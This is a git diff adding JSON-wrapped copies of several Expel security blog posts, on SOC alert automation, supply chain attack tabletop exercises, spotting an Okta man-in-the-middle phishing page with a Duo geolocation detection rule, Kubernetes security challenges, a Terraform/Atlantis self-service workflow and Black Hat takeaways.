region. This shows how often the user is logging in from different IP addresses and the frequency of those logins A user agent summary. This shows the user-agents recorded for the user over the past 30 days. Our robots also grab user details from O365 or G-Suite and MFA device activity to arm our analyst with more context. By asking the right questions and then handing the heavy lifting off to our robots, most suspicious login alerts can be triaged in a matter of minutes. Here are the post automation alert pathway stats for May 2020. Alert pathway % of alerts following pathway (post automation) Alert-to-close 86% (+25%) Pursue as investigations 14% (-25%) We\u2019ve made a once painful class of alerts much easier to handle and that\u2019s a great outcome for our SOC analysts and our customers. Parting Encouragement Ask the right questions; achieve the desired result. That\u2019s why we created decision support. It makes it super easy to answer the right questions. Remember, decision support is not sticky notes. It starts with a group of people sitting down and understanding what\u2019s happening and where we need to adjust. It really helps to have good SOC metrics in place before you start down this path. Draw the big picture and start to zoom in on areas where you think the team might be struggling." +} \ No newline at end of file diff --git a/supply-chain-attack-prevention-3-things-to-do-now.json b/supply-chain-attack-prevention-3-things-to-do-now.json new file mode 100644 index 0000000000000000000000000000000000000000..1235538d1aebc6a4f932a557014ef791ed89c056 --- /dev/null +++ b/supply-chain-attack-prevention-3-things-to-do-now.json @@ -0,0 +1,6 @@ +{ + "title": "Supply chain attack prevention: 3 things to do now", + "url": "https://expel.com/blog/supply-chain-attack-prevention-3-things-to-do-now/", + "date": "Jan 11, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Supply chain attack prevention: 3 things to do now Threat Intelligence \u00b7 6 MIN READ \u00b7 BRUCE POTTER \u00b7 JAN 11, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools You can\u2019t trust the internet. As a security professional, you\u2019ve likely figured that out already. But it turns out that we do place a lot of trust in the software and services we access each day. We expect them to: Provide us with the functionality we want; and Function properly (without allowing bad things to happen) At the core, this is what we mean when we talk about integrity of a computing platform. It should only do what we intend and not things we don\u2019t intend. For instance, if I have an enterprise monitoring system, I expect it to do appropriate monitoring of things and not provide a backdoor for external threat actors to access my network. That\u2019s the nature of what happened in the SolarWinds Orion incident , and there are many similar examples of other supply chain incidents that have left security professionals everywhere reeling. Sure, we\u2019ve all built abstractions such as security assessments and third-party risk management programs to attempt to manage the potential risks associated with our systems, but the reality is the fate of our enterprises are often in other people\u2019s hands. When we think about cyber attacks, we often wonder: \u201cWhat if I\u2019m attacked?\u201d But this recent cyber attack reminds us that we also need to ask: \u201cWhat if I lose trust in the tech I rely on to keep my org safe?\u201d Let\u2019s talk about what we do at Expel to prepare for moments when trust is broken, how I think this translates to what we\u2019ve observed and learned from the SolarWinds Orion breach and what you can do to be prepared against supply chain attacks in the future. How to prepare for a supply chain attack: Run a tabletop exercise There\u2019s a common pattern with threat actors: they pick out a target, phish them, get access and then carry out their nefarious deeds. It might be ransomware, it might be data theft or it might be for intelligence purposes. Whatever the reason, one thing\u2019s for sure: you\u2019re the target and you have to deal with the consequences. But what if a provider that a large percentage of the internet relies on is compromised? These types of attacks have dramatically different impacts on an organization and the response can be very different than what\u2019s covered in a standard incident response (IR) plan. To prepare for this type of situation, Expel runs tabletop exercises periodically. The particular simulation I\u2019m thinking of is one in which we presented that CircleCI went out of business. (For those who aren\u2019t familiar, CircleCI is a SaaS solution that helps developers integrate and deploy code in a streamlined and automated way, and claims over 30 thousand customers running over a million builds a day.) Note that during these simulations, I give incomplete information. During this exercise, the facts presented to the team lead them to believe that they hadn\u2019t gone out of business but had in fact been completely compromised. Being the good facilitator I am, I let the team run with that idea, and the results were pretty fascinating. To be clear, this was a simulation \u2013 CircleCI, of course, did not go out of business. The key in creating an effective exercise is to make up a scenario that would wreak havoc on your org so that every team member gets a chance to both think creatively and flex their IR muscles. And that\u2019s what I did here. After we got over the \u201coh no\u201d moment of knowing the CI provider was compromised, we had to grapple with the potential impact an attack like this could potentially have. Not only could we not trust our code running in production, but we couldn\u2019t trust the code running in production of CircleCI\u2019s 30 thousand customers. That\u2019s a big problem \u2013 CircleCI has a lot of big brand customers like Docker and Facebook, and well as supporting SaaS solutions of all shapes and sizes around the world. We faced a situation where we could no longer trust the Internet in the way we had; not for production services, not for productivity solutions, not for back office systems. The problem for the team became, \u201chow do we continue to deliver Expel\u2019s services in this new reality?\u201d The discussions during the tabletop around business continuity, communications and customer interactions were unlike any we had had in previous tabletops. We focused on: Figuring out where trustworthy artifacts existed in order to reconstitute our production environment from scratch. From there, we examined what external services we were willing to continue to use and what services we had to walk away from immediately. Rearchitecting the entire production environment on the fly in an attempt to keep our service viable while ensuring our customers\u2019 networks weren\u2019t in jeopardy. If anyone from CircleCI is reading this, hi! We love you and wish your team well. This was just a tabletop and not at all a reflection of how we view CircleCI\u2019s security program. A look at how supply chain attacks are evolving: SolarWinds Orion Fast forward from when we ran our CircleCI simulation to December 2020, and we are faced with a similar real-life example with SolarWinds Orion. While not quite the same as having your CI provider popped, it still had the potential to impact enough organizations at a deep enough level that we nearly experienced a \u201ccan\u2019t trust the Internet\u201d moment. While it looks like a relatively small number of companies had direct malicious actions against them, the cybersecurity community is still sorting it all out. But many of us are in fact reflecting on the trust we put in our providers, software and hardware. With still unknowns about which companies and agencies are compromised and the current state of those networks, rethinking what services we rely on and the location of data means having discussions with businesses we\u2019ve never had before. Contrast this to the attacks we saw in the 2010 timeframe. Both the Google Aurora-style attacks as well attacks against the Defense Industrial Base (DIB) were well coordinated and sophisticated. These were also highly targeted attacks launched against high-value organizations and subverted trust in the core of the systems in many of these enterprises. Having dealt with some of those intrusions personally, I will say recovery from them was difficult and expensive for many organizations and resulted in large scale changes in how they thought about security. What we\u2019re seeing in 2020 is much different. For starters, the impact of the SolarWinds Orion hack isn\u2019t targeted in the same way. Rather than having a few providers to worry about, we have 18 thousand that may have been compromised. So thinking about reducing exposure to this attack has a very different feel than what we dealt with in 2010. On the flip side, we have much better security signal now than we had in 2020. Endpoint monitoring and interrogation technology has improved dramatically. For cloud based workloads, we have the ability to introspect on them from underneath. For example, services like CloudTrail and GuardDuty from Amazon Web Services (AWS) give us simple, detailed information about what is executing where and providing high fidelity detection information. Unlike 2010, even when we knew bad actors were in the network and we couldn\u2019t find them, better instrumentation helped many of the 18 thousand impacted companies take publicly available information about these attacks and rapidly determine either, \u201cyep, we were compromised\u201d or \u201cseems pretty unlikely we were compromised\u201d. Being 100 percent sure is not possible, but today we can have a much higher degree of assurance than we could in the past. 3 things you can do right now to better protect your org against a supply chain attack The impact of the SolarWinds Orion hack will be felt for years to come. This is a somewhat rare event that causes organizations to lose trust in many systems and services all at once. However, it\u2019s critical we use this time to learn lessons and prepare for the next large scale event that causes us to question the integrity of huge swaths of the Internet. Because it\u2019s a given that we will have another one of these moments. It\u2019s possible to prepare for these events, but it requires a different kind of response than what you might normally plan or table-top for. Here are some things you can do: Plan for supply chain attacks \u2013 The word \u201csupply chain\u201d can mean different things to different orgs, but for many tech companies, your supply chain is a long list of cloud services that facilitate your day-to-day business. Have plans for alternative supply chain providers \u2013 We\u2019re not saying you need to have a hot backup for all your cloud services. But you should at least plan for potentially rapid provider shifts if a catastrophic event happens. This should be largely in line with your business continuity plans (which you\u2019ve tested, right?). Be creative \u2013 Failures of imagination are a real thing. And it can be very difficult to dream up attacks like SolarWinds Orion or vulnerabilities like Heart Bleed. When planning tabletops, ask people around your company: \u201cWhat\u2019s the worst thing that could happen?\u201d You might be surprised at the scenarios others are worrying about." +} \ No newline at end of file diff --git a/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json b/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json new file mode 100644 index 0000000000000000000000000000000000000000..040cb886625277f2208a256c649b850ae83cb621 --- /dev/null +++ b/swimming-past-2fa-part-1-how-to-spot-an-okta-mitm.json @@ -0,0 +1,6 @@ +{ + "title": "Swimming past 2FA, part 1: How to spot an Okta MITM ...", + "url": "https://expel.com/blog/2fa-part-1-how-to-spot-okta-mitm-phishing-attack/", + "date": "Jul 13, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Swimming past 2FA, part 1: How to spot an Okta MITM phishing attack Security operations \u00b7 4 MIN READ \u00b7 JOSHUA KIM, EVAN REICHARD AND ASHWIN RAMESH \u00b7 JUL 13, 2021 \u00b7 TAGS: Cloud security / MDR Credentials phishing attacks are on the rise and bad actors are finding new and creative ways to bypass multi-factor authentication (MFA). This trend isn\u2019t surprising \u2013 a large percentage of people abruptly switched to remote work last year. And attackers didn\u2019t waste time in taking advantage of the upheaval. We\u2019ve noticed that one multi-factor authentication solution in particular caught the eye of attackers \u2013 Okta. Why Okta? Orgs that use Okta rely on its authentication and access management feature to grant users access to their apps. This is the holy grail for a threat actor, giving them a one-stop shop to access multiple apps that can be used to stage an attack or exfiltrate data. We sounded the alarm about this trend in an infographic . But what do these types of attacks look like? Missed the infographic? Click here. That\u2019s what we\u2019re going to cover here. In this two-part blog series, we\u2019re going to share an example of an Okta phishing attack that we responded to in our security operations center (SOC). The attacker used a man-in-the-middle (MITM) tactic to send users to a fake Okta login page. This post will go over how we detected that a user\u2019s credentials were compromised, how you can spot a phony Okta page and we\u2019ll share some tips on how your org can stay resilient against these types of attacks. We\u2019ll follow up with a deep dive into our investigative process in the second part of this series \u2013 so stay tuned! Phishing for credentials So, what happened? Attackers emailed a link to a fake Okta login page from the email service provider, SendGrid. If a user submitted their credentials using the fake Okta page, they were redirected to a page masquerading as the Duo Security MFA page that was hosted by the attacker. While the org had configured two-factor authentication (2FA), the attacker\u2019s phishing campaign and social engineering successfully circumvented existing security controls by hijacking the user\u2019s authenticated network sessions. Spotting a fake Okta page The fake Okta login page mirrored settings of the users\u2019 workplace, like the org\u2019s logo, and was convincing enough to leave them unaware that they weren\u2019t logging into their normal login page. But there were some telltale signs that this was a phishing attempt. Let\u2019s look at the fake login and two-factor authentication pages that were created. Do you notice anything strange? The fake Okta login and two-factor pages. Once we started our investigation, here are some things we noticed right off the bat: The attacker-owned phishing site was using the non-secure HTTP over HTTPS. The attacker-owned site didn\u2019t render the security image or the default avatar picture when entering a username. The \u201cRemember Me\u201d option was missing the checkbox. The attacker used similar but not exactly the same language on their page. The attacker-owned site said \u201cNeed sign-in assistance?\u201d while a real Okta page reads \u201cNeed help signing in?\u201d The bottom left hyperlink should state, \u201cPowered by Okta\u201d not \u201cOktaPowered by.\u201d Other things seemed off, and we noted minor details like different font style and sizes between the respective texts. Detecting Duo malicious logins During initial triage, we started to dig into how the user\u2019s credentials were compromised. We noticed that there were two devices (and their IP addresses) in the Duo Authentication Logs associated with a Duo Push Authentication event: Access Device \u2013 The device from which the user is requesting the Duo Push. Authentication Device \u2013 The device approving or rejecting the Duo Push. For a legitimate authentication event, we can assume that the access device and the authentication device are in close proximity to each other, and since we have the IP addresses of both devices, we can build a detection off this assumption. An example SIEM query-based rule is provided below. SIEM query-based rule The first step was to get a geographical location from the IP addresses. We did this by enriching the IP addresses using SumoLogic\u2019s geo://location operator. This gave us the latitude, longitude and the country codes of both IP addresses. We then used an additional SumoLogic feature called haversine , which allows us to determine the birds-eye distance between two geographical coordinates. Finally, using the newly derived distance and country of origin for both the access and authentication device, we can generate an alert if the countries differ or if the distance between the two devices exceeds a determined length. This doesn\u2019t mean that there aren\u2019t false positives. Some organizations use various VPNs/proxies that could cause a legitimate login to appear illegitimate. For example, if the user happens to be using a VPN on their phone or authentication device, it could fire an alert if the devices aren\u2019t recognized. At Expel, we\u2019re able to mitigate some of the false positives by hooking this detection into a context database. This allows us to suppress the alert if one of the IP addresses is originating from a known and authorized VPN or network egress point. 4 tips on how you can prevent credentials phishing While the tried and true methods of phishing attacks, like business email compromise (BEC), persist \u2013 phishing tactics are getting more sophisticated. And we\u2019ll likely see more instances of phishing or credentials phishing similar to this attack in the future. Beyond implementing best security practices for Okta (enabling MFA, network blocklisting, enforcing complex passwords, enabling email notifications for end users and device trust), updating your security awareness training when a new type of attack is identified can help reduce your phishing triage-related headaches. There are four things that you can share with your employees to ensure they don\u2019t fall victim to this type of attack: Enforce MFA prompts when users connect to sensitive apps via app-level MFA. Don\u2019t make your Okta a one-stop shop for an attacker. Protect your sensitive apps with additional MFA to help add another layer of defense. Remind your users to make note of and remember the security image tied to their Okta account on the sign in page. If your users don\u2019t see or recognize their chosen security image, they might be on a fraudulent page. Tell your users to always review the source of the 2FA request (if via push notification) to verify if the login is from the expected region/area. If they get an unexpected login request, encourage them to report the event. They can do that either by email or using the reporting features within the 2FA mobile app. Customize your Okta sign-in page appearances. Believe it or not, we\u2019re pretty good at pattern recognition. When implemented, if a user lands on a default Okta sign-in page with no customization, it may help trigger their spidey-sense and let them know that something isn\u2019t right. This incident serves as a reminder that we always need to stay sharp and think twice before clicking a link or hitting that sign-in button. Find out what Expel looks for when a phishing email is submitted" +} \ No newline at end of file diff --git a/tell-dr-kubernetes-where-it-hurts-expel.json b/tell-dr-kubernetes-where-it-hurts-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..3733aac5f1edea3f83df2c59c8d00b14e2b6e37e --- /dev/null +++ b/tell-dr-kubernetes-where-it-hurts-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Tell Dr. Kubernetes where it hurts - Expel", + "url": "https://expel.com/blog/tell-dr-kubernetes-where-it-hurts/", + "date": "Jan 26, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Tell Dr. Kubernetes where it hurts Security operations \u00b7 2 MIN READ \u00b7 DAN WHALEN \u00b7 JAN 26, 2023 \u00b7 TAGS: Cloud security Let\u2019s start with some numbers: The container application market is expected to grow to $12 billion by 2028 (a compound annual growth rate [CAGR]) of >33%. Kubernetes (k8s) will drive a majority of the expansion. The container and Kubernetes security market projects to grow to $8.2B by 2030 (27.4% CAGR from 2021-2030). 96% of respondents to a 2021 Cloud Native Computing Foundation (CNCF) survey reported using or evaluating k8s. A RedHat survey found that 85% of IT leaders consider Kubernetes to be important or extremely important for their business. In other words, Kubernetes is exploding (in a good way). And for important reasons. It saves money. It improves DevOps efficiency. Workloads can be deployed in multicloud environments. It affords more portability and minimizes vendor lock-in. K8s schedules and automates container deployment across multiple compute nodes. It promotes app stability and availability in the cloud. And it\u2019s fully open-source. As is the case for many (most? all?) new technologies, though, Kubernetes faces growing pains. That same RedHat report noted that 55% of DevOps, engineering and security teams had delayed applications because of security concerns and 93% experienced at least one security incident in their k8s environments in the last year. Top Kubernetes pain points Our customers have walked us through a number of issues they encounter, and three stand out. 1: Lack of coverage for Kubernetes environment. K8s applications are increasingly popular with application developers, but SecOps teams need coverage for every app, endpoint, network, and more \u2013 a huge requirement. With the rapid adoption of container applications through Kubernetes, these businesses now have a significant number of workload applications that aren\u2019t proactively monitored \u2013 if they\u2019re monitored at all. 2: Security as a business inhibitor versus enabler. No, this one isn\u2019t unique to k8s \u2013 the war between business and security seems old as time. And the basic dynamics make sense. Organizations want to innovate, move fast, and grow. Security teams want to prevent Bad Things\u00ae from happening. Unfortunately, when cybersecurity is perceived as a drag on the business, the business often counters by circumventing security \u2013 which brings us back to Bad Things\u00ae. In the case of Kubernetes, developers are deploying container apps and security isn\u2019t monitoring them. When security isn\u2019t integrated from the start, the entire business is exposed to significant risk. 3. Growing attack surface with limited security expertise. Another not-new problem made worse by k8s: hiring and retaining talent, something that has plagued the cybersecurity industry for a long time. The 2022 (ISC)2 Cybersecurity Workforce Study, released last October, found a global shortage of 3.4 million workers in the field \u2013 roughly equivalent to the population of Utah. With Kubernetes, the talent pool is even slimmer. 48% of respondents in a 2022 survey said the \u201clack of in-house skills and limited manpower [is] the biggest obstacle to migrating to or using Kubernetes and containers\u2026\u201d So, security operations teams are underwater. They lack the time and resources to become experts on every new attack vector. Innovation and business demands associated with a hot new technology intensify the pressure, inducing a reactive approach to everything, weakened effectiveness across the board, fatigue, burnout, and mounting risk levels. Did we miss anything? Stay tuned to this space. We have some more useful analysis of the Kubernetes market, its benefits and challenges, and maybe even some ideas to help you better implement and manage your own strategy in the coming weeks. In the meantime, drop us a line with any questions." +} \ No newline at end of file diff --git a/terraforming-a-better-engineering-experience-with-atlantis.json b/terraforming-a-better-engineering-experience-with-atlantis.json new file mode 100644 index 0000000000000000000000000000000000000000..7beec21c8d2ec44e28c78ebed893ab42df6b3353 --- /dev/null +++ b/terraforming-a-better-engineering-experience-with-atlantis.json @@ -0,0 +1,6 @@ +{ + "title": "Terraforming a better engineering experience with Atlantis", + "url": "https://expel.com/blog/terraforming-better-engineering-experience-with-atlantis/", + "date": "Aug 4, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Terraforming a better engineering experience with Atlantis Engineering \u00b7 8 MIN READ \u00b7 REILLY HERREWIG-POPE \u00b7 AUG 4, 2020 \u00b7 TAGS: Cloud security / Get technical / How to / Managed security / Tools Wearing the engineering cap in a cloud-native environment means living in a world that revolves around open-source tech. There\u2019s a dizzyingly vast ecosystem of powerful open source tools at our disposal, sure \u2013 but very few of them offer the ability to solve more abstract organizational challenges by themselves. When it comes to open-source tools, sometimes it\u2019s like playing a game of Tetris \u2026 you have to figure out how to use and shift those tools to wind up with a winning development approach. Mastering open source Tetris is great, but what\u2019s even more important when it comes to developing anything is to truly understand the needs of your users. And if you can figure out not just what they need but how to provide them with a platform they can use to solve their own problems \u2026 that\u2019s when things start to get really exciting. In this post, I\u2019ll talk about why we at Expel realized it was time to reevaluate how users interact with our core engineering platform, our approach to building a system that makes our users happy (with the help of Terraform and Atlantis) and walk you through a hypothetical scenario of what our new system looks like from the user\u2019s perspective. If you or your team are beginning to think about how to build a more robust Terraform execution pipeline, or you already have one and are looking at how to transform it into something more self-serviceable and palatable for end-users, then read on \u2013 this post might be for you! Core engineering platform vision At Expel, engineering is divided into feature teams. These feature teams own one or more services in their entirety. This includes developing the features, managing the CI/CD pipelines, managing the monitoring and owning the on-call rotation for their services. A site reliability engineer\u2019s (SRE) role is to provide a platform that makes doing all of this easy. In fact, the core platform should make it so easy for a feature team to self-service provisioning their own cloud infrastructure that it would be less convenient to ask someone to do it for them. Platform plight A critical step to building any feature, let alone an entire platform, is incorporating user feedback into the development process. Towards the beginning of development, our users let us know that the process for managing GCP CloudSQL instances felt tedious and obtuse. They were right \u2013 it was. While teams were given the keys to control their own destiny, they were not equipped with much tooling to help them get there. They were forced to internalize the Terraform DSL well enough to write their own code, manage their own statefiles, rationalize IAM policy and spend time grokking the nuances of each provider\u2019s implementation. This can feel like a lot of yak shaving when you\u2019re just looking for a darn database! And furthermore, we were seeing missed opportunities to apply SRE best-practices, patterns and guard rails to new infrastructure. For example, at Expel, SREs have developed a standard pattern for a Postgres CloudSQL slow query configuration that we think is usually a great idea to have enabled. But with our setup at the time, engineers did not have an easy way to inherit these benefits. Having users miss out on out-of-the-box database optimizations such as this would be no good! Any of this sound familiar? It was clear we needed some form of abstraction that would reduce the burden of Terraform development as well as package up SRE best practices into the code being written. We sat down to rethink our approach. Enter Atlantis and Expel modules What we knew we needed Okay, so we knew we needed to provide an easy way for engineers to manage their own cloud resources and monitors that would come with SRE\u2019s cloud expertise out of the box. So what exactly were our requirements? Consumable abstraction for users: This is the tricky one! The platform needs to be easy to use. We need some form of central abstraction so that, as a platform user, I can set up everything I need without being forced to internalize how it all works under the hood. Infrastructure-as-code: This should probably go without saying, but all infrastructure changes must be managed via Git. While the benefits of the Infrastructure-as-Code philosophy are outside the scope of this post ( though here\u2019s a great overview by Hashicorp ), it\u2019s worth calling out as a requirement. Completely automated: It\u2019s critical that automation drives all changes. Making infrastructure changes by executing code from an engineering workstation is widely discouraged for a number of reasons, including an increased attack surface, inconsistent code execution environments and lack of scalability. Auditability: We must be able to easily tie every infrastructure change to an individual user. What we chose After pulling our requirements together, this is the stack we chose to solve our problem: Terraform: We embrace Hashicorp\u2019s Terraform for defining our entire Google Cloud and Datadog footprints. Atlantis: An open source Terraform workflow tool for teams . Atlantis enables teams to manage Terraform changes in an easy and familiar way. Expel Terraform modules: An internal collection of opinionated libraries supported by SRE that packages the most common infrastructure and monitoring needs into parameterized Terraform modules . Users love them because they can hit the ground running without requiring a deep understanding of low-level cloud intricacies. SRE loves them because we can enable self-service for our users while still ensuring our expertise carries over everywhere that changes are happening \u2013 even (and especially) when we\u2019re not aware of them. GitHub: Where it all comes together. The Terraform code change management is not just tracked in GitHub, but the code execution itself is orchestrated through GitHub comments from the associated pull request (PR). Advantages and takeaways There are a host of advantages that the system provides our org. Here\u2019s what we love about it: Enables self-service for most common infrastructure needs. There\u2019s no \u201cDevOps\u201d team waiting for you to throw a ticket over the wall to have your GCS bucket and service account provisioned. The process is only gated by how fast you can review and comment! No sacrifice is made to SRE best practices in exchange for the self-service model. Externalizing all of SRE\u2019s common patterns and experience into documented, easy-to-use modules ensures that SRE expertise is packaged in with service owners\u2019 deployments. Atlantis solves a common Terraform gotcha around scenarios involving multiple concurrent Terraform changes by implementing its own distributed locking mechanism. Atlantis will prevent any other proposed changes from being processed by applying its own special lock to any Terraform configuration that has an open PR against it. This allows users to work out of a branch and apply their change before it\u2019s merged to master, which protects users from having to submit multiple PRs to solve `terraform apply` failures. In order to tee up another change, an engineer must either apply and merge the pull request, close it or manually release the lock via a special UI provided by Atlantis. Crazy visibility. While Git should be the source of truth for all changes regardless of how Terraform code is applied, having all orchestration happening out in the open in the PR fosters a healthy and transparent environment. By using the GitOps approach and ensuring only machines are executing our Terraform code, we reduce our attack surface by limiting the number of credentials and privileged hosts. Putting it all together As you can probably imagine, we\u2019re always looking for new ways to enable our analysts and keep our customers safe. And since Expel\u2019s backend is built using a microservice architecture, new applications get spun up all the time. Now we\u2019re going to walk through a hypothetical end-to-end example to demonstrate how the process works as a platform user. In this scenario, we\u2019ll pretend for a moment that we\u2019re software engineers spinning up a brand new service named `super-slick-service` that will benefit from using the open source software Redis. You can almost hear the (albeit contrived) conversation from the design meeting conference room: Jim: Hey! If our new app needs Redis, I heard GCP offers a managed Redis service called Memorystore. How can we go about sprinkling some of that on our app? Ali: I think SRE provides a Terraform module that we can use to provision that. Jim: Cool, but how can our app access the instance? Do we need to ask someone to set up DNS records for it? And how can we get some viz into instance health for things such as system capacity? Ali: The module sets up everything we need, including the DNS and Datadog monitors that will alert our team if we\u2019re beginning to run into capacity issues. Just run through the doc \u2013 it should only take a few minutes. Pull up the core platform docs Okay, we know what we need to do. Now it\u2019s time to stress the importance of platform documentation! Effective tools won\u2019t do nearly as good if it\u2019s not clear how to harness their power. Check out this README for our Memorystore Terraform module: Core platform Terraform module documentation Call the module with your desired parameters Okay, so now we\u2019ve pulled up the documentation and are going to invoke the Memorystore module and pass in just the basic bits that we need to specify. We\u2019re throwing the following code into our favorite IDE: Calling the Terraform Memorystore module Apply your change in GitHub via Atlantis Cool. So now we have our code and we\u2019re submitting it via pull request in GitHub. Here\u2019s where the magic happens. Submitting the pull request A GitHub pull request submission to call our Terraform module Reviewing the plan output One of the most important steps in any Terraform workflow relies on the `terraform plan` feature. The `terraform plan` provides the user a snapshot of what Terraform would do in the event that it had been executed. It displays the delta between the desired state of your infrastructure as defined by your current commit versus its actual state provided by the providers\u2019 API. This is a critical step in any Terraform workflow because while Terraform enables you to orchestrate impressive feats of progress, it in turn enables you to orchestrate impressive feats of destruction if you don\u2019t exercise great scrutiny upon your plan review. Luckily, this part is Atlantis\u2019 bread and butter. Atlantis provides a wonderfully executed mechanism to sidestep the need for platform users to set up a local Terraform toolchain: GitHub comments! It does this by leveraging webhooks to allow GitHub users to execute Terraform via comments in the GitHub pull request. As long as you\u2019re authorized to operate on your application repo, you\u2019re able to harness the power of Terraform while dodging a whole category of headache that can come in the form of cumbersome state file management , mismatching Terraform and provider versions or brittle Terraform execution pipeline builds. It\u2019s a beautiful thing! Once your PR is submitted, Atlantis will manage the `terraform plan` on your behalf and submit the output for review in comment-form. Not only does this allow the author to review the proposed changes with minimal fuss, but it cranks up the visibility for the entire team to eleven since the plan output is dropped right in the PR! Terraform plan output as commented on our GitHub pull request via Atlantis Executing the change Great. Your code and `terraform plan` changes have been reviewed by team members and have been approved. Now how to put your change into effect? Just drop a comment in GitHub with an `atlantis apply` to pull the trigger on your change! And when the `atlantis apply` step is finally complete, you can count on a neat summary dropped in as \u2013 you guessed it \u2013 another GitHub comment! Sweet, now we can merge! Terraform apply output as commented on our GitHub pull request via Atlantis You can now see all the effects of your pull request being applied. Memorystore instance We have a brand new Memorystore instance, hot off the press: GCP Cloud Console reflecting our new Memorystore instance DNS record set A DNS A record has been provisioned for the instance: GCP Cloud Console reflecting our new DNS record Datadog monitor You can see here how our Datadog monitor query has been automatically scoped to our new instance ID: Datadog web console reflecting our new capacity monitor Measuring platform use Another important aspect to platform engineering is measuring user engagement. We want the platform to emit usage metrics wherever possible to help SREs understand how and when the platform is being used. In this case, we bake some telemetry into our modules by using local-exec provisioners that run from the Atlantis pod when modules are being invoked. Having this in place lets us look back in time to make more informed, data-driven decisions. Datadog web console reflecting module invocations over the past week Parting thoughts Delivering a useful platform can be challenging. If we\u2019re steadfast in our commitment to remain engaged with our users as well as continuing to view technologies not as one-size-fits-all solutions, but as discrete tools meant to be assembled to create a powerful experience, we set ourselves up to build a successful platform that our users look forward to using. Want to find out more? Luke Jolly has kindly given back to the Atlantis community via the Atlantis contribution. You can see the conversation here . If you have any further questions, feel free to reach out to us !" +} \ No newline at end of file diff --git a/that-s-a-wrap-top-3-takeaways-from-black-hat.json b/that-s-a-wrap-top-3-takeaways-from-black-hat.json new file mode 100644 index 0000000000000000000000000000000000000000..4de41279f40be0d1360a478e7e43cfc6a825278d --- /dev/null +++ b/that-s-a-wrap-top-3-takeaways-from-black-hat.json @@ -0,0 +1,6 @@ +{ + "title": "That's a wrap! Top 3 takeaways from Black Hat", + "url": "https://expel.com/blog/top-3-takeaways-from-black-hat-2022/", + "date": "Aug 18, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG That\u2019s a wrap! Top 3 takeaways from Black Hat Expel insider \u00b7 3 MIN READ \u00b7 KELLY FIEDLER \u00b7 AUG 18, 2022 \u00b7 TAGS: Cloud security / Company news / MDR Even with Vegas in the rearview mirror, we\u2019re still reeling from the excitement of our first time exhibiting at Black Hat USA. Mandalay Bay buzzed with the energy of a community nostalgic for its days at summer camp\u2014Hacker Summer Camp, that is. This year\u2019s event felt especially energized with more people, exhibitors, and fun. Our friendly bots, Josie\u2122 and Ruxie\u2122, joined us on the showfloor (plushies, anyone?), and we chatted with friends old and new about our approach to security. Then, through lots and lots of demos, we showed why we believe security can even be delightful. Now that the dust has settled and our suitcases are (mostly) unpacked, here are some of our big takeaways. 1. Having your head in the clouds might not be such a bad thing\u2026 Cloud security continues to gain momentum as a hot conference topic across the industry\u2014and for good reason. In his keynote address, Chris Krebs of the Krebs Stamos Group, and former director of the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA), touched on the increasingly complex issue. He argued the pandemic drove an accelerated move to cloud infrastructures, creating larger ecosystems where productivity and ease tend to win over security. Cybercriminals understand this shift, so defenders must be ready. It\u2019s part of the reason we just released this handy guide to mapping the MITRE ATT&CK Framework to Google Cloud Platform (GCP). We\u2019re sharing the lessons we\u2019ve learned through our own investigations to help you and your team tackle GCP incident investigations\u2014so we can take on the cloud, together. (And if you\u2019re operating in Amazon Web Services (AWS) or Azure, don\u2019t sweat it\u2014we\u2019ve got you covered with our AWS Mind Map and Azure Guidebook .) 2. (Cyber) history repeats itself\u2014it\u2019s up to us to look for the signs. Kim Zetter, author and investigative journalist, reminded us that we\u2019ve seen a lot of the same warning signs about cyber risk before. According to Zetter, the 2010 discovery of Stuxnet triggered a shift in cybercrime\u2014opening the eyes of the community to the link between cybersecurity and national security. But despite the incredible advancements the industry has made since Stuxnet, many organizations still suffer from major, preventable incidents because they didn\u2019t heed the warning signs. At Expel, we\u2019ve also seen this pattern of attackers relying on tried-and-true techniques across our customer base. Our recent research revealed a shift in pre-ransomware activity , as attackers opted for older techniques to combat new changes by Microsoft (more on this in our Expel Quarterly Threat Report ). We\u2019re seeing threat actors continue to use old techniques instead of adopting new ones. Why? Because it works. But there\u2019s a silver lining: if we continue information sharing across the growing community of cybersecurity defenders, then we have a better chance at seeing the writing on the wall and identifying signs of potential threats before they cause harm. (Hint: this is the goal behind our quarterly threat reports.) 3. It\u2019s going to take a village. Community reigned as the overarching theme of the week. This thread ran through keynotes and briefings alike, as this tight-knit community of defenders steadily grows alongside the threats we face. We heard from industry icons, including Jeff Moss, the founder of Black Hat himself, about the new team emerging when it comes to cybersecurity: the community of people using their roles in cybersecurity to improve the world. Moss noted that businesses responding to the Russian invasion of Ukraine demonstrated the cybersecurity industry\u2019s significant influence in the world, as some companies turned off access to their services or shut down their websites. The point? We\u2019re part of an influential community with the power to do some good in the world\u2014but it\u2019s going to take us working together to get there. Now that it\u2019s all said and done, we\u2019re already counting down the days until it\u2019s time to pack our bags and head back to camp! Ahead of the show, we shared the product advancements , resources, and capabilities we\u2019ve been hard at work on, and we can\u2019t wait to keep the excitement rolling. Want to know more about how we do what we do? Reach out anytime ." +} \ No newline at end of file diff --git a/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json b/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json new file mode 100644 index 0000000000000000000000000000000000000000..0f1d3e7ab20abcfd71b286cc573cfa813f98f276 --- /dev/null +++ b/the-ciso-in-2020-and-beyond-a-chat-with-bruce-potter.json @@ -0,0 +1,6 @@ +{ + "title": "The CISO in 2020 (and beyond): A chat with Bruce Potter", + "url": "https://expel.com/blog/ciso-in-2020-and-beyond-chat-with-bruce-potter/", + "date": "Nov 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG The CISO in 2020 (and beyond): A chat with Bruce Potter Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 NOV 23, 2020 \u00b7 TAGS: CISO / MDR / Tech tools You\u2019ve probably run into a few headlines declaring that 2020 saw \u201cthe rise of the CISO.\u201d Well, we agree. This year required all of us to step up to 